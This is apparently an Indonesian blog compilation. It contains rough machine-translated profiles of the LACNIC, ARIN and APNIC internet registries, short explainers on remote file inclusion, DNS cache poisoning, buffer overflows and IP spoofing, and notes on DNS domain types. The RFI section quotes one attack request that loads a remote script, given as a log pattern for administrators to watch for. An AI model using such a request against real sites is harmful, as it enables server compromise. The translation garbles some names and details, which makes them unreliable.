* Organisasi Pendukung Alamat (ASO)
NRO juga melaksanakan fungsi ASO, salah satu organisasi pendukung diminta oleh peraturan ICANN. The ASO tinjauan dan mengembangkan rekomendasi tentang Kebijakan internet yang berkaitan dengan sistem IP yang menangani dan menyarankan ICANN Dewan tentang hal ini.

* World Summit di Masyarakat Informasi (WSIS)
Sebagai bagian dari NRO, yang RIPE NCC secara aktif terlibat dalam WSIS.

* Internet Governance Forum (IGF)
Sebagai bagian dari NRO, yang RIPE NCC secara aktif terlibat dalam IGF.

Latin American and Caribbean Internet Addresses Registry (LACNIC)

LACNIC adalah Regional Internet Registry untuk Amerika Latin dan Karibia daerah.
LACNIC nomor menyediakan alokasi sumber daya dan layanan registrasi yang mendukung operasi global Internet. Ini adalah bukan untuk mencari keuntungan, organisasi berbasis keanggotaan yang anggotanya termasuk Internet Service Provider, dan organisasi serupa.

LACNIC fungsi utama adalah:

* Mengalokasikan IPv4 dan IPv6 address space, dan Autonomous System Numbers
* Memelihara Database Whois publik untuk Amerika Latin dan Karibia
* Reverse DNS delegasi
* Mewakili kepentingan Amerika Latin dan Karibia komunitas internet di panggung global

Sejarah

Sejak tahun 1993, organisasi-organisasi akademis di Amerika Latin seperti ENRED - Foro de redes de America Latina kamu El Caribe, mendiskusikan kebutuhan register untuk Amerika Latin. Pada tahun 1998 selama pertemuan di Panamá ENRED termasuk NIC-MX, tema ini sedang dibahas dan mereka mengetahui bahwa kelompok lain yang dibentuk oleh organisasi komersial seperti CABASE - Camara Argentina de Base de Datos y Servicio em Línea dan e-COMLAC (Amerika Latin dan Karibia Federasi untuk Internet dan Electronic Commerce), juga mendiskusikan gagasan tentang american latin registri.

Pada tanggal 30 Januari 1998, Ira Magazincr, maka penasihat senior Presiden Clinton untuk pengembangan kebijakan, merilis sebuah makalah diskusi, yang dikenal sebagai "kertas hijau". Sebuah versi revisi yang dikenal sebagai "kertas putih" dirilis pada tanggal 5 Juni. Makalah ini mengusulkan sebuah organisasi baru untuk menangani sumber daya internet. (yang terlambat menjadi ICANN). Setelah rilis ini sejumlah kelompok, konferensi yang diselenggarakan untuk membahas proposal dan membuat saran, di antara mereka, IFWP atau International Forum untuk White Paper.

IFWP diselenggarakan empat pertemuan, yang terakhir di Buenos Aires, di mana beberapa orang Amerika selatan orang dan organisasi dibedakan berpartisipasi dan mulai mengenal satu sama lain. Di antara mereka Messano Oscar, Anthony Harris dan Edmundo Valiente dari CABASE, Fabio Marinho, anggota Comite Gestor de Brasil - Brasil internet Steering Committee dan Presiden ASSESPRO - Associação Brasileira de Empresas de Software Serviços de Informática e Internet, Raimundo Beca-AHCIET - Asosiasi Hispanoamericana de Centros de Investigacion y Empresas de telecomunicaciones, Brasil, México Nic-Oscar Robles dan Jerman Valdez, y Julian Dunayevich, Raul Echeverria. ENRED

Bergabung dengan organisasi-organisasi eCOMLAC - Federación Latino Americana y Caribeña para Internet y el Comercio electrónico, argumented bahwa alamat IP Amerika Latin, dapat ditangani oleh suatu badan lokal dan mencapai kesepakatan untuk penciptaan. Orang lain berpartisipasi dalam diskusi awal ini, di antara Eliezer CADENAS (ENRED), Fidel Vienegas (AHCIET), Raphael Mandarino (CG_B).

Akhirnya kesepakatan untuk penciptaan LACNIC (Amerika Latin dan Karibia IP Address Daerah Registry), ditandatangani di Santiago de Chile pada 22 Agustus 1999 selama pertemuan ICANN yang kedua.

Sebuah Dewan Interim didefinisikan dengan enam anggota:

* AHCIET - Raimundo Beca;
* CABASE - Jorge Plano, kemudian digantikan oleh Oscar Messano;
* CG-Br - José Luis Ribeiro;
* ENRED - Julian Dunayerich; kemudian digantikan oleh Raul Echeverria;
* NIC-Mx - Jerman Valdez;
* ECOMLAC - Fabio Marinho;

Langkah berikutnya, LACNIC ini disampaikan Dewan Sementara pada 26 Agustus 1999, perjanjian ini untuk Esther Dyson, maka Ketua Interim ICANN ICANN Board untuk persetujuan.
Sebuah Rencana Bisnis atau organisasi baru ini dikembangkan dan disajikan kepada ARIN, organisasi yang bertanggung jawab untuk wilayah kami. Anggaran Dasar diciptakan dan diputuskan bahwa akan LACNIC kantor pusat di Montevideo, dengan orang-orang teknis dan peralatan di São Paulo, Brazil NIC di tempat.
LACNIC secara resmi diakui oleh ICANN selama pertemuan Shanghai pada tahun 2002.
LACNIC didirikan pada 2001, dengan kantor administrasi di Montevideo, Uruguay dan fasilitas teknis yang disediakan oleh Comite Gestor da Internet Brasil São Paulo.

The LACNIC terdiri dari:

* Anggota
Anggota dapat langsung mempengaruhi kegiatan LACNIC dan jasa. Anggota bertanggung jawab untuk pencalonan dan pemilihan kandidat dalam Badan Eksekutif LACNIC dan untuk menerima skema pengisian LANIC dan menyetujui LACNIC Laporan Keuangan setiap tahun. Anggota juga memberikan masukan kepada, dan umpan balik, kegiatan yang dilakukan dan layanan yang diberikan oleh LACNIC.
* Executive Board
* LACNIC mencalonkan dan memilih anggota Badan Eksekutif. Dewan terdiri dari enam anggota dan bertanggung jawab untuk menunjuk Directo Eksekutif LACNIC dan untuk situasi keuangan secara keseluruhan LACNIC.
* LACNIC Staf
* Anggota staf melakukan kegiatan LACNIC, memberikan layanan kepada anggotanya dan memberikan dukungan administrasi bagi LACNIC.

Organisasi yang menerima alamat IP dari LACNIC secara otomatis langsung menjadi anggota. Menurut ukuran ruang alamat setiap organisasi mengelola, ada anggota yang berbeda kategori dan tingkatan. Keanggotaan terbuka untuk setiap orang atau organisasi yang berminat; ini berarti bahwa organisasi-organisasi yang tidak langsung menerima alamat IP dari LACNIC juga dapat mengajukan aplikasi keanggotaan.

Hal ini tidak perlu menjadi anggota LACNIC sebelum mengajukan permohonan untuk ruang alamat IP (atau sumber daya lainnya), juga tidak akan berbuat demikian memudahkan untuk mendapatkan mereka.

LACNIC perjanjian kerjasama

Sejak pembentukannya, LACNIC telah mengadopsi kebijakan kerjasama yang aktif berusaha untuk mengkonsolidasikan dirinya sebagai sebuah organisasi, untuk memperkuat keterlibatan dalam pertumbuhan dan pengembangan Internet di wilayah, dan untuk memenuhi tujuan utamanya manajemen sumber daya Internet untuk wilayah Latin Amerika dan Karibia.

Contoh dari hal ini adalah perjanjian yang ditandatangani awal dengan melakukan Gestor Comite Internet NIC Brasil dan Meksiko. Melalui perjanjian pertama adalah mungkin untuk memiliki infrastruktur teknis dan sumber daya manusia yang diperlukan untuk LACNIC pusat operasional di kota São Paulo selama dua tahun pertama keberadaannya. Dalam kasus perjanjian dengan NIC Meksiko, sangat mungkin untuk mengimplementasikan rencana pelatihan LACNIC dengan mengorbankan kata organisasi, melalui bahan dan persiapan penyelenggaraan pertemuan di berbagai negara dari kawasan kita.

Kedua perjanjian memiliki peran yang sangat penting dalam pencapaian LACNIC stabilitas dan kelangsungan hidup selama tahap-tahap awal.

Demikian pula, kami percaya bahwa dengan menghasilkan berbagai kesepakatan kerjasama dan kegiatan LACNIC dapat membuat kontribusi yang signifikan bagi penguatan lembaga serta pertumbuhan dan perkembangan komunitas internet di kawasan ini.

LACNIC's partisipasi dalam setiap perjanjian adalah bervariasi dan tergantung pada kemampuan yang tersedia di masing-masing kasus, tetapi maksudnya adalah selalu untuk melengkapi sumber daya dan tindakan setiap organisasi. Untuk alasan ini, dalam beberapa kasus berpartisipasi dengan menggunakan dana sendiri atau memperoleh dana dari luar daerah, dalam orang lain dengan memfasilitasi pelembagaan organisasi regional, mengintegrasikan dan co-organisasi yang berpartisipasi dalam forum dan aktivitas lainnya serta mendukung penelitian pada isu-isu strategis.

Jadi, meskipun tidak peran utamanya, LACNIC memberikan kontribusi untuk pertumbuhan dan evolusi komunitas Internet regional, meningkatkan kehadiran internasionalnya dan relevansi, mengakibatkan tingkat keterlibatan yang lebih besar dan berpengaruh pada definisi kebijakan dan pengelolaan sumber daya global di jaringan tingkat internasional.

* NIC-BR - LACNIC Perjanjian
* NIC-MX - LACNIC Perjanjian
* CLARA - LACNIC Perjanjian Kerjasama
* ECOM-LAC - LACNIC Perjanjian Kerjasama
* LACTLD - LACNIC Perjanjian Kerjasama
* ICA-IDRC - LACNIC Agreement (Frida Program)
* ISC - LACNIC Perjanjian (Proyek + RAICES)
* ORT University - LACNIC Perjanjian
* Universitas Republik (Fakultas Teknik) - Perjanjian LACNIC
* Exchange Program dengan RIR lain
* Dukungan dan Partisipasi di Daerah Acara dan Forum lain

The Number Resource Organization

Dengan RIR lain, LACNIC adalah anggota dari Number Resource Organization (NRO), yang ada untuk melindungi sumber daya nomor belum dialokasikan renang, untuk mempromosikan dan melindungi bottom-up proses pengembangan kebijakan, dan menjadi titik fokus input ke dalam sistem RIR.

American Registry for Internet Numbers (ARIN)

American Registry for Internet Numbers (ARIN) adalah Regional Internet Registry (RIR) untuk Kanada, Karibia dan banyak pulau-pulau Atlantik Utara, dan Amerika Serikat. ARIN mengelola nomor Internet distribusi sumber daya, termasuk IPv4 dan IPv6 ruang dan nomor AS. ARIN membuka pintunya untuk bisnis di 22 Desember 1997after menggabungkan pada tanggal 18 April 1997. ARIN adalah sebuah lembaga nirlaba di negara bagian Virginia, negara bagian AS. Hal ini bermarkas di wilayah tak berhubungan Fairfax County, Virginia, Washington Dulles International Airport dan dekat Chantilly.


ARIN adalah salah satu dari lima Regional Internet Registry (RIR) di dunia. Seperti RIR lainnya, ARIN:

* Memberikan layanan yang berkaitan dengan koordinasi teknis dan manajemen sumber daya nomor Internet
* Memfasilitasi pengembangan kebijakan oleh para anggota dan stakeholder
* Berpartisipasi dalam komunitas internet internasional
* Apakah nirlaba, organisasi berbasis masyarakat
* Apakah diperintah oleh dewan eksekutif dipilih oleh keanggotaannya


Sejarah

Organisasi ini dibentuk pada Desember 1997 untuk "menyediakan layanan registrasi IP sebagai independen, lembaga nirlaba." Sampai saat ini IP pendaftaran di wilayah ARIN dilakukan oleh suatu departemen dalam perusahaan Network Solutions, yang menyediakan staf awal dan infrastruktur komputer untuk ARIN.

Presiden pertama ARIN Kim Hubbard, dari tahun 1997 sampai tahun 2000. Kim digantikan oleh Raymond "Ray" Plzak sampai akhir 2008. Trustee John Curran adalah pejabat Presiden sampai 1 Juli tahun 2009 ketika ia mengambil peran CEO secara permanen. Ray Plzak tetap sebagai konsultan untuk organisasi.

Sampai akhir tahun 2002 itu disajikan Meksiko, Amerika Tengah, Amerika Selatan dan seluruh Karibia. LACNIC sekarang menangani bagian dari Karibia, Meksiko, Amerika Tengah, dan Amerika Selatan. Juga, Sub-Sahara Afrika merupakan bagian dari wilayahnya sampai April 2005, ketika AfriNIC secara resmi diakui oleh ICANN sebagai kelima Regional Internet Registry.


Layanan

ARIN menyediakan layanan yang berkaitan dengan koordinasi teknis dan manajemen sumber daya nomor Internet. Sifat layanan ini dijelaskan dalam pernyataan misi ARIN:

Menerapkan prinsip-prinsip pelayanan, ARIN, sebuah lembaga nirlaba, mengalokasikan sumber daya Protokol Internet; mengembangkan kebijakan berbasis konsensus dan memfasilitasi kemajuan Internet melalui informasi dan pendidikan penjangkauan.


Layanan ini dikelompokkan dalam tiga bidang: Pendaftaran, Organisasi, dan Kebijakan Pembangunan.

Pendaftaran Layanan

Pendaftaran Layanan berkaitan dengan koordinasi teknis dan pengelolaan inventarisasi sumber daya nomor Internet. Layanan meliputi:

* Alokasi alamat IPv4 dan penugasan
* Alamat IPv6 alokasi dan penugasan
* Nomor AS penugasan
* Direktori layanan termasuk:
o Registrasi informasi transaksi (WHOIS)
o Routing informasi (Internet Routing Registry)
* DNS (Reverse)

Untuk informasi tentang nomor internet meminta sumber daya dari ARIN, lihat https://www.arin.net/sumber daya/index.html. Bagian ini meliputi permintaan template, kebijakan distribusi khusus, dan panduan untuk meminta dan mengelola sumber daya nomor internet.

Organisasi Pelayanan

Layanan organisasi berkaitan dengan interaksi antara para stakeholder, ARIN anggota, dan ARIN. Layanan meliputi:

* Pemilihan
* Anggota rapat
* Informasi publikasi dan penyebarluasan
* Pendidikan dan pelatihan


Kebijakan Pengembangan Jasa

Jasa Pengembangan kebijakan memfasilitasi pengembangan kebijakan untuk koordinasi teknis dan manajemen sumber daya nomor Internet.

Semua kebijakan ARIN diatur oleh masyarakat. Setiap orang didorong untuk berpartisipasi dalam proses pengembangan kebijakan di pertemuan kebijakan publik dan pada Kebijakan Publik Mailing List (ppml@arin.net). The ARIN Dewan Pengawas kebijakan meratifikasi hanya setelah:

1. diskusi di milis, dan pada saat rapat;
2. Dewan Pertimbangan ARIN rekomendasi;
3. konsensus masyarakat yang mendukung kebijakan dan
4. hukum penuh dan fiskal review.

Masyarakat mengembangkan kebijakan dengan mengikuti Proses Pengembangan Kebijakan formal seperti diuraikan di https://www.arin.net/kebijakan/pdp.html. Kebijakan The Number Resource Manual, ARIN set lengkap kebijakan saat ini, tersedia di https:// www.arin.net/kebijakan/nrpm.html.

Keanggotaan tidak diperlukan untuk berpartisipasi dalam pengembangan kebijakan ARIN proses atau menerapkan sumber daya nomor Internet.

Layanan meliputi:

* Mempertahankan diskusi daftar e-mail
* Melakukan pertemuan kebijakan publik
* Penerbitan dokumen kebijakan

Struktur Organisasi

ARIN terdiri dari komunitas internet di dalam wilayah, para anggotanya, 7-anggota Dewan Pengawas, 15-anggota Dewan Penasehat, dan staf profesional di bawah 50. Dewan Pengawas dan Dewan Penasehat dipilih oleh anggota ARIN selama tiga tahun.

Dewan Pengawas

Keanggotaan yang ARIN memilih Dewan Pengawas (BOT), yang memiliki tanggung jawab utama untuk urusan bisnis dan keuangan ARIN kesehatan, dan mengelola operasi ARIN dengan cara yang sesuai dengan petunjuk yang diterima dari Dewan Pertimbangan dan tujuan yang ditetapkan oleh anggota registri . Bot bertanggung jawab untuk menentukan disposisi dari semua pendapatan yang diterima untuk memastikan semua layanan yang disediakan dalam cara yang adil. Bot meratifikasi proposal yang dihasilkan dari keanggotaan dan dikirimkan melalui Dewan Penasehat. Keputusan eksekutif dilaksanakan setelah disetujui oleh BOT.

BOT terdiri dari 7 anggota:

* Scott Bradner (Bendahara)
* John Curran (Presiden dan CEO)
* Timotius Denton
* Lee Howard (Sekretaris)
* Paul Vixie (Ketua)
* Bill Woodcock
* Vacant Position

Dewan Penasehat

Di samping BOT, ARIN memiliki Dewan Pertimbangan yang memberikan nasihat ARIN dan alokasi IP BOT pada kebijakan dan hal-hal terkait. Mengikuti prosedur di Internet Resource Proses Evaluasi Kebijakan, Dewan Penasehat depan kebijakan berbasis konsensus proposal kepada BOT untuk diratifikasi.

Dewan Penasehat terdiri dari 15 anggota yang dipilih:

* Dan Alexander
* Paul Andersen
* Cathy Aronson
* Marla Azinger
* Leo Bicknell
* Marc Crandall
* Bill Darte
* Owen DeLong
* David Farmer
* Stacy Hughes
* Scott Leibrand
* Lea Roberts
* Robert Seastrom
* Heather Schiller
* John buah apel manis (Ketua)

Negara-negara di wilayah layanan ARIN adalah:

* Anguilla
* Antarctica
* Antigua and Barbuda
* Bahamas
* Barbados
* Bermuda
* Bouvet Island (Norway)
* Canada
* Cayman Islands (UK)
* Dominica
* Grenada
* Guadeloupe (France)
* Heard and McDonald Islands (Australia)
* Jamaica
* Martinique (France)
* Montserrat
* Puerto Rico (U.S.)
* Saint Kitts and Nevis
* Saint Lucia
* Saint Vincent and the Grenadines
* St. Helena (UK)
* St. Pierre and Miquelon (France)
* Turks and Caicos Islands
* United States
* United States Minor Outlying Islands
* British Virgin Islands (UK)
* U.S. Virgin Islands (U.S.)

Asia-Pacific Network Information Centre (APNIC)

Asia Pacific Network Information Centre (APNIC) adalah Regional Internet Registry untuk kawasan Asia Pasifik.
APNIC menyediakan jumlah alokasi sumber daya dan layanan registrasi yang mendukung operasi global Internet. Ini adalah bukan untuk mencari keuntungan, organisasi berbasis keanggotaan yang anggotanya termasuk Internet Service Provider, Internet Registries Nasional, dan organisasi serupa.


APNIC fungsi utama adalah:

* Mengalokasikan IPv4 dan IPv6 address space, dan Autonomous System Numbers
* Memelihara Database Whois publik untuk wilayah Asia Pasifik
* Reverse DNS delegasi
* Mewakili kepentingan komunitas internet Asia Pasifik di panggung global


Pertemuan Kebijakan Terbuka

Setiap tahun, APNIC mengadakan dua pertemuan kebijakan terbuka. Ini memberikan kesempatan masyarakat untuk datang bersama-sama untuk pengembangan kebijakan, pengambilan keputusan, pendidikan, pertukaran informasi, dan jaringan - baik profesional dan sosial. Kebijakan Terbuka pertama setiap tahun Rapat diselenggarakan sebagai jejak konferensi Asia Pacific Regional Internet Conference on Operational Technologies (APRICOT), dan yang kedua adalah sebagai standalone diadakan pertemuan. Pertemuan diadakan di berbagai lokasi di seluruh Asia Pasifik dan sering melibatkan unsur-unsur budaya ekonomi negara tuan rumah.



Pelatihan APNIC

APNIC mengadakan beberapa kursus pelatihan di berbagai lokasi di seluruh wilayah. Kursus-kursus ini dirancang untuk mendidik peserta untuk mahir mengkonfigurasi, mengelola dan memberikan layanan internet mereka dan infrastruktur dan untuk menerima praktek-praktek terbaik saat ini.

Whois database

Database Whois APNIC detail dari registrasi berisi alamat IP dan nomor AS awalnya dialokasikan oleh APNIC. Ini menunjukkan organisasi-organisasi yang memegang sumber daya, di mana alokasi dibuat, dan rincian kontak untuk jaringan. Organisasi yang memegang sumber daya yang bertanggung jawab untuk memperbarui informasi mereka dalam database. Basis data dapat dicari dengan menggunakan antarmuka web pada situs APNIC, atau dengan mengarahkan klien whois Anda whois.apnic.net (misalnya, whois-h whois.apnic.net 203.37.255.97).

Sejarah

APNIC didirikan pada tahun 1992 oleh Asia Pasifik Koordinator Komite Penelitian Intercontinental Networks (APCCIRN) dan Asia Pacific Engineering and Planning Group (APEPG). Kedua kelompok itu kemudian digabung dan berganti nama menjadi Kelompok Jaringan Asia Pasifik (APNG). Ini didirikan sebagai sebuah proyek percontohan untuk memberikan ruang alamat seperti yang didefinisikan oleh RFC-1366, dan juga mencakup singkat yang lebih luas: "Untuk memfasilitasi komunikasi, bisnis, dan budaya dengan menggunakan teknologi internet".

Pada tahun 1993, APNG menemukan mereka tidak mampu menyediakan payung formal atau struktur hukum untuk APNIC, dan jadi pilot proyek ini menyimpulkan, tetapi APNIC terus eksis secara independen di bawah kekuasaan IANA sebagai 'proyek sementara'. Pada tahap ini, APNIC masih tidak memiliki hak-hak hukum, keanggotaan, dan struktur biaya.

Pada tahun 1995, pelantikan diadakan pertemuan APNIC di Bangkok. Ini adalah pertemuan dua hari, dijalankan oleh para relawan, dan bebas untuk hadir. Sumbangan sukarela dicari sesuai dengan ukuran organisasi, mulai dari $ 1.500 untuk 'kecil', melalui ke $ 10.000 untuk 'besar'. Tiga anggota jenis didefinisikan oleh APNIC-001: ISP (lokal IR), Enterprise, dan Nasional.

1996 melihat struktur biaya yang layak diperkenalkan, pembentukan keanggotaan, dan penyelenggaraan pertemuan APRICOT pertama.

1997 Pada saat tiba, itu menjadi semakin jelas bahwa APNIC lingkungan setempat di Jepang membatasi pertumbuhan - misalnya, staf terbatas pada anggota 4-5. Oleh karena itu, perusahaan konsultan KPMG dikontrak untuk menemukan lokasi yang ideal di kawasan Asia Pasifik untuk APNIC markas baru.

Untuk alasan-alasan seperti infrastruktur stabil, rendahnya biaya hidup dan operasi, dan keuntungan pajak bagi organisasi keanggotaan, Brisbane, Australia dipilih sebagai lokasi baru, dan relokasi selesai antara bulan April dan Agustus, 1998, sambil tetap menjaga seluruh operasi terus-menerus.

Pada tahun 1999, relokasi itu selesai, krisis ekonomi Asia berakhir, maka mulai periode konsolidasi untuk APNIC - masa pertumbuhan berkelanjutan, pengembangan kebijakan, dan penciptaan dokumentasi dan sistem internal.

Sejak itu, APNIC telah terus tumbuh dari awal yang sederhana ke anggota lebih dari 1.500 di 56 ekonomi di seluruh wilayah dan sekretariat dari sekitar 50 anggota staf yang terletak di kantor pusat di Brisbane, Australia.


Proses pengembangan kebijakan

Kebijakan-kebijakan APNIC dikembangkan oleh keanggotaan dan lebih luas komunitas internet. Media besar untuk pengembangan kebijakan adalah face-to-face Pertemuan Kebijakan Terbuka, yang diadakan dua kali setiap tahun, dan milis diskusi.

Pengembangan kebijakan APNIC prosesnya adalah:

* Buka
* Siapa saja dapat mengusulkan kebijakan.
* Setiap orang dapat membicarakan proposal kebijakan.
* Transparan
* APNIC dokumen publik semua diskusi kebijakan dan keputusan.
* Bottom-up
* drive komunitas pengembangan kebijakan.

Dokumen APNIC semua diskusi kebijakan dan keputusan untuk memberikan transparansi lengkap dari proses pengembangan kebijakan.

APNIC mewakili kawasan Asia Pasifik, yang terdiri dari 56 ekonomi:

* Afghanistan
* Samoa Amerika (US)
* Australia
* Bangladesh
* Bhutan
* British Indian Ocean Territory (UK)
* Brunei Darussalam
* Kamboja
* People's Republic of China
* Christmas Island (AU)
* Kepulauan Cocos (Keeling) Kepulauan (AU)
* Kepulauan Cook (N.Z.)
* Timor Timur
* Fiji
* Polinesia Perancis (Perancis)
* Wilayah Prancis Selatan (Perancis)
* Guam (US)
* Hong Kong (RRC)
* India
* Indonesia
* Jepang
* Kiribati
* Korea Utara
* Korea Selatan
* Laos
* Makau (RRC)
* Malaysia
* Maladewa
* Kepulauan Marshall
* Mikronesia
* Mongolia
* Myanmar (Burma)
* Nauru
* Nepal
* Kaledonia Baru (Perancis)
* Selandia Baru
* Niue (N.Z.)
* Pulau Norfolk (AU)
* Kepulauan Mariana Utara (US)
* Pakistan
* Palau
* Papua Nugini
* Filipina
* Pitcairn (Inggris)
* Samoa
* Singapura
* Solomon
* Sri Lanka
* Taiwan
* Thailand
* Tokelau (N.Z.)
* Tonga
* Tuvalu
* Vanuatu
* Vietnam
* Kepulauan Wallis dan Futuna (Perancis)
APNIC tertutup Madagaskar, Mauritius dan Seychelles sampai AfriNIC terbentuk.

5 Badan Pengatur DNS di dunia

Remote File Inclusion (RFI)

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi.

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya(Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, dll..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan ddos.


Hal yang bisa dilakukan untuk menghindari dari serangan ini adalah :


Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

DNS Cache Poisoning

DNS Cache Poisoning merupakan sebuah cara untuk menembus pertahanan dengan cara menyampaikan informasi IP Address yang salah mengenai sebuah host, dengan tujuan untuk mengalihkan lalu lintas paket data dari tujuan yang sebenarnya. Cara ini banyak dipakai untuk menyerang situs-situs e-commerce dan banking yang saat ini bisa dilakukan dengan cara online dengan pengamanan Token. Teknik ini dapat membuat sebuah server palsu tampil identik dengan dengan server online banking yang asli. Oleh karena itu diperlukan digital cerficate untuk mengamankannya, agar server palsu tidak dapat menangkap data otentifikasi dari nasabah yang mengaksesnya. Jadi dapat disimpulkan cara kerja DNS (Domain Name System) poisoning ini adalah dengan mengacaukan DNS Server asli agar pengguna Internet terkelabui untuk mengakses web site palsu yang dibuat benar-benar menyerupai aslinya tersebut, agar data dapat masuk ke server palsu.
DNS Poisoning sendiri dahulu pertama kali ditunjukkan tahun 1997 oleh Eugene Kashpureff dengan cara mengalihkan request ke host InterNIC menuju ke situs pendaftaran domain name alternatif, AlterNIC. Request berhasil dialihkan dengan cara mengeksploitasi vulnerability pada DNS Service. Pada waktu Name Server menerima jawaban DNS Query, sumber jawaban ini membiarkan informasi yang tidak ditanyakan. Dengan begitu Kashpureff dapat memasukkan informasi DNS palsu pada jawaban yang sebenarnya tersebut. Name server yang menerima jawaban tersebut akan langsung menerima jawaban tersebut dan menyimpan informasi apapun yang didapatkannya dalam cache-nya. Hal ini mengakibatkan apabila user mencoba me-resolve suatu host dalam domain InterNIC, maka ia akan menerima informasi IP Address dari AlterNIC. Dengan kata lain ia sudah dialihkan ke alamat palsu.

Buffer Overflows

Beberapa serangan umum Buffer overflow, diantaranya:

a. Buffer overruns pada kebanyakan Web server
Webserver Apache dan IIS memiliki celah keamanan. Worm seperti Code Red (untuk IIS) dan Linux. Slapper (untuk Apache) menjadikan celah keamanan yang lebar.

b. DNS overflow
Beberapa server DNS (BIND) sebelumnya tergolong rentan terhadap overflow. Suatu serangan yang akan memberikan nama DNS sangat panjang. Nama DNS dibatasi hingga 64-byte per subkomponen dan 256 byte secara keseluruhan.

c. Serangan DNS
Server DNS biasanya dijalankan pada mode ‘Trust’ oleh service dan user – maksudnya bahwa server DNS dapat dikompromikan agar melancarkan serangan lebih jauh pada user dan service lainnya. Hal ini menjadikan server DNS merupakan target utama serangan para hacker.

d. Mengelabui cache DNS
Serangan yang umum terhadap server DNS. Sederhananya, bekerja dengan mengirimkan suatu pertanyaan untuk meminta domain yang sesungguhnya (“siapakah www.test.com ini?) dan akan disediakan jawaban yang tentu saja salah (“www.test.com adalah 127.0.01″).

IP spoofing

IP spoofing adalah sejumlah serangan yang menggunakan perubahan sumber IP Address. Protokol TCP/IP tidak memiliki cara untuk memeriksa apakah sumber IP address dalam paket header benar-benar milik mesin yang mengirimkannya. Kemampuan ini sering dimanfaatkan oleh para hacker untuk melancarkan serangan seperti:

a. SMURF Attack
Suatu Broadcast ping yang terkirim dan sumber IP dari ping terlihat sama dengan IP address korban. Dalam kasus ini sejmlah besar komputer akan merespon balik dan mengirim suatu Ping reply ke korban. Kejadiannya terus berulang-kali, hingga mesin korban atau link mengalami overload dan dalam kondisi Denial of Service.

b. Prediksi jumlah rangkaian TCP
Suatu koneksi TCP yang ditandai dengan suatu jumlah rangkaian client dan server. Jika jumlah rangkaian tersebut dapat ditebak, para hacker dapat membuat packet dengan memalsukan IP address dan menebak urutan jumlah untuk melakukan hijack koneksi TCP.

c. Prediksi rangkaian melalui pemalsuan DNS
Server DNS biasanya mengquery server DNS lain untuk mengetahui nama host yang lain. Seorang hacker akan mengirimkan suatu request ke server DNS target seolah-olah seperti respon ke server yang sama. Dengan cara ini para hacker dapat membuat client yang mengakses, misalnya situs www.hotmail.com ke server milik sang hacker.

Monday, February 21, 2011

Macam-macam Tree domain

Generic Domain

Domain generik mendefinisikan host terdaftar sesuai dengan perilaku generik mereka. Setiap simpul di pohon mendefinisikan suatu domain, yang merupakan indeks untuk nama ruang database domain seperti di Gbr.6. Tingkat pertama di bagian domain generik memungkinkan tujuh label tiga-karakter yang menggambarkan jenis organisasi seperti terlihat pada tabel 1. Baru-baru ini beberapa tingkat pertama-label telah dietujui.



Country Domain


Negara bagian menggunakan domain-karakter negara singkatan dua (misalnya, iq untuk Irak).


Invers Domain
domain invers digunakan untuk memetakan sebuah alamat ke nama.

Parsial Qualifed Domain Name (PQDN)

Jika label tidak diakhiri dengan string null, disebut nama domain berkualifikasi parsial (PQDN),. A PQDN mulai dari node tapi tidak mencapai akar. Hal ini digunakan ketika nama harus diselesaikan termasuk dalam situs yang sama sebagai klien. Berikut resolver bisa menyediakan bagian yang hilang, yang disebut akhiran, untuk menciptakan sebuah FQDN.

Misalnya, jika pengguna di fhda.edu tersebut. Situs ingin mendapatkan alamat IP dari komputer penantang, ia dapat mendefinisikan nama parsial Challenger

Klien DNS atc.fhda.edu menambahkan akhiran. Sebelum melewati alamat untuk server DNS. Klien DNS biasanya memegang daftar akhiran. Berikut dapat beberapa dari daftar sufiks di De Anza College.

FQDN (Fully Qualifed Domain Name)

Fully Qualifed Domain Name (disingkat menjadi FQDN), dalam sistem penamaan domain Domain Name System (DNS) merujuk kepada nama bertitik yang dapat mengidentifikasikan sebuah host Transmission Control Protocol/Internet Protocol (TCP/IP) di dalam jaringan dan Internet. FQDN juga sering disebut sebagai Absolute Domain Name. FQDN didiskusikan dalam RFC 1035, RFC 1123 dan RFC 2181.

